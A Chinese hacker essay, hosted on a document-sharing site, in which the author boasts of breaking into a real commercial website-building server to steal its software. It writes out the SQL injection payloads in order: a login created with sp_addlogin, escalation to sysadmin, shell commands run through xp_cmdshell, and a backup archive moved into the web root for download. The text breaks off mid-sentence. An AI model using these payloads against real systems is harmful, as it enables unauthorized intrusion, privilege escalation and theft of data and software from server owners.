SQLServer存储过程在入侵中的应用.docVIP

  1. 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  4. 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  5. 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  6. 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  7. 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
SQLServer存储过程在入侵中的应用

SQL Server 存储过程在入侵中的应用(原创) 就在写这篇文章的前20分钟,小猫入侵了一个大型的智能建站服务器,本来小猫是很少把自己的猫脚印(踪迹)写出来的,但想到这样,又好象对不起论坛上各位想了解和学习黑客知识的朋友,并且一直想找个机会来跟我们?Martin_ty?大哥(Martin_ty就是他在论坛上的名字,一个CCNP来的啊!!)交流以下?sql?injection?的应用,所以这次,就写写出来吧(写不好不许咬啊): 入侵了这个服务器(就是指那个大型的智能建站服务器,鉴于《黑客守则》,这个服务器在下面就称为?S服务器?吧!),原因是我们工作室想做一个智能建站的系统,是面向企业的,但我们穷啊,没钱去买,自己开发又实在太太太太浪费时间,并且在全社会的经济效益的角度来说,自己再重新开发一套这样的系统出来,实在不是明智的做法(在社会总产出的角度来看,再开发一套系统出来,相比原来在S服务器上现有的系统来说,就是做了重复的事情,根本不符合经济原则,IT一条非常明显的特点就是,软件的可复制性!所以,最好的就是能去S服务器复制一份过来!),然而让小猫十分失望的是,我发现S服务器上的管理员原来不是一个经济学家,也不是一个白吃饭,这样一来,不用问他也知道,他肯定不会让我复制的嘛,在没办法之际: 记得前几天,《黑客防线》被黑,那个署名“小鹿”的黑客在入侵日志中写到:“当我看见那些类似?article.asp?classid 212?的东西的时候,就很习惯在后面加点参数……”,呵呵,看来那诶大哥已经对?sql?injection?养成了条件反射了,呵呵~~~~ 小猫仔细看了一下对方网站的所有内容,类似?article.asp?classid 212?的那些东西还真不少啊,随便在一个的后面加了一个单引号(就选择brow.asp?id 34好了),出现了下面的错误: ?Microsoft?OLE?DB?Provider?for?SQL?Server?错误?80040e14? ??在关键字?and?附近有语法错误。? ??/company/brow.asp,行28? 很明显对方是存在sql?injection的漏洞,并且还要是?sql?server?的数据库,这回机会来了! 先是看看对方有没有开3389的服务先: telnet? ?3389 正在连接到 ...无法打开到主机的连接?在端口?3389?:?连接失败 呜~~~没有开3389~~~ 看来利用sql?server来添加系统帐号的用处不是很大,干脆直接获取sql?server的系统管理员帐号更好,于是再telnet一次: telnet? ?1433 很快就出现一个空白的屏幕,在等待信息的输入,很明显,对方的主机是可以远程连接sql?server的! 关掉这个telnet窗口,再转到brow.asp?id 34那里去,在后面加多一些东西: brow.asp?id 34;exec?sp_addlogin?cat,cat520,master;-- 执行,返回正常的页面,证实了命令执行成功!在S服务器上的sql?server已经成功添加了一个帐号cat,密码就是cat520,登陆到sql?server服务器上的master数据库上。 在打开sql?server的“查询分析器”,输入S服务器的IP,帐号:cat,密码:cat520,几秒后,并出现了查询控制台了! 先试试能不能运行系统命令: exec?xp_cmdshell?dir?c:\?/a 错误信息5001:GetProxyAccount 禁止使用?Execute?操作... 晕,看来这个cat帐号的级别实在不高,没权限来调用exec命令,也没有权限来使用?xp_cmdshell?这个扩展存储过程,看来要先得把cat提升到?System?Administrators?的组里面才行: brow.asp?id 34;EXEC?sp_addsrvrolemember?@loginame cat,?@rolename? sysadmin;-- 返回正常页面!! 然后重新用cat来连接对方服务器: exec?xp_cmdshell?dir?c:\?/a 呵呵,C盘的文件在查询分析控制台的返回信息窗口,列出来了!!呵呵!! 几经辛苦,终于找到了那套程序的存放点,看来那个管理员也蛮“聪明”的,事先已经把我想要的程序打包好了(我知道,他是在做备份,所以打包了),放在E盘的根目录下,看来我想要那程序,还得要移动那个打包了的RAR文件了,在查询分析控制台上输入: exec?xp_cmdshell?move?e:\web.rar?e:\wwwroot\web.rar 成功了,马上用flashget下了下来了!!喵~~(大概过了一个多小时,那文件有1G多,

文档评论(0)

kakaxi + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档